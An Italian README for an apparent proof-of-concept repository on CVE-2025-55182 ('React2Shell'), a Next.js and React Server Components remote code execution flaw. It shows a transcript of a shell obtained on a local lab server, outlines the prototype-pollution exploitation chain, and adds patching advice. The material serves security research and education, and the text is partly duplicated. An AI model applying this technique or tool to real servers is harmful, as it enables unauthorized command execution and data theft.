
Questo progetto fornisce una dimostrazione completamente funzionale di CVE-2025-55182 (React2Shell) - una vulnerabilità critica di Remote Code Execution in React Server Components e Next.js.
Questo progetto fornisce una dimostrazione perfettamente funzionante di CVE-2025-55182 (React2Shell) – una vulnerabilità critica di esecuzione remota di codice nei React Server Components e in Next.js.
Stato: ✅ FUNZIONANTE – Ottiene l'esecuzione effettiva di comandi su server vulnerabili
CVE-2025-55182 (eseguibile compilato da 7.8 MB)📥 Scarica il video della demo (5.6 MB) – Clicca per scaricare e vedere lo sfruttamento in azione
Cosa mostra la demo:
cd exploited-server
npm run dev
# Il server si avvia su http://localhost:3001
cd /Users/subh/Desktop/code-playground/react-2-shell-demo
./CVE-2025-55182
# Quando richiesto:
Target: localhost:3001
Comandi di base:
subh@rce $ whoami
subh@rce $ pwd
subh@rce $ ls -la
subh@rce $ hostname
Operazioni sui file:
subh@rce $ touch hello.txt
[+] Creato: hello.txt
subh@rce $ vi hello.txt
[i] Inserisci il nuovo contenuto (scrivi 'EOF' su una riga vuota per terminare):
Hello World!
EOF
[+] File salvato: hello.txt
subh@rce $ cat hello.txt
Hello World!
subh@rce $ echo "New content" > hello.txt
[+] File scritto
subh@rce $ rm hello.txt
[+] Rimosso: hello.txt
Informazioni di sistema:
subh@rce $ cat package.json
subh@rce $ node --version
subh@rce $ npm --version
subh@rce $ ps aux
Uscita:
subh@rce $ exit
Questo progetto dimostra:
✅ Sfruttamento reale – RCE effettivamente funzionante su sistemi vulnerabili ✅ Ricerca sulla sicurezza – Comprensione delle vulnerabilità dei moderni framework web ✅ Sviluppo in Go – Compilazione e uso di strumenti di sicurezza ✅ Analisi delle vulnerabilità – Ricerca e tecniche di sfruttamento CVE ✅ Divulgazione responsabile – Pratiche di test etici di sicurezza
react-2-shell-demo/
├── CVE-2025-55182 # Eseguibile Go dello sfruttamento compilato
├── main.go # Codice sorgente Go
├── exploited-server/ # App Next.js vulnerabile
│ ├── app/
│ │ ├── actions.ts # Server Actions (vulnerabili)
│ │ └── page.tsx # UI di avviso
│ └── package.json # Next 15.0.1, React 19.0.0
└── *.md # Documentazione
CVE-2025-55182 sfrutta una deserializzazione insicura nei React Server Components:
__proto__Function()1. Crea un payload multipart con chunk malevoli
2. Invia all'endpoint Server Actions di Next.js
3. Attiva l'inquinamento del prototipo tramite __proto__:then
4. Invoca il costruttore Function() con il comando
5. Esegue il codice e restituisce l'output tramite reindirizzamento
6. Analizza il risultato dall'header X-Action-Redirect
AVVISI CRITICI:
README.md – Questo fileGO_EXPLOIT_USAGE.md – Utilizzo dettagliato dello sfruttamentoVULNERABLE_SERVER.md – Guida all'installazione del serverEXPLOITATION_GUIDE.md – Approfondimento tecnicoUSAGE.md – Esempi di utilizzo e comandinpm run dev in exploited-server)./CVE-2025-55182)Questo progetto dimostra con successo:
Per sistemi in produzione:
Aggiorna immediatamente alle versioni corrette:
Ruota i segreti se esposti prima del 4 dicembre 2025
Monitora i log per attività sospette delle Server Actions
Verifica le applicazioni che utilizzano Server Components
@subhdotsol – A scopo educativo e di ricerca sulla sicurezza
Questo codice è destinato esclusivamente a scopi educativi e test di sicurezza autorizzati.
Ricorda: Ottieni sempre la dovuta autorizzazione prima di fare test. Usa in modo responsabile! 🔒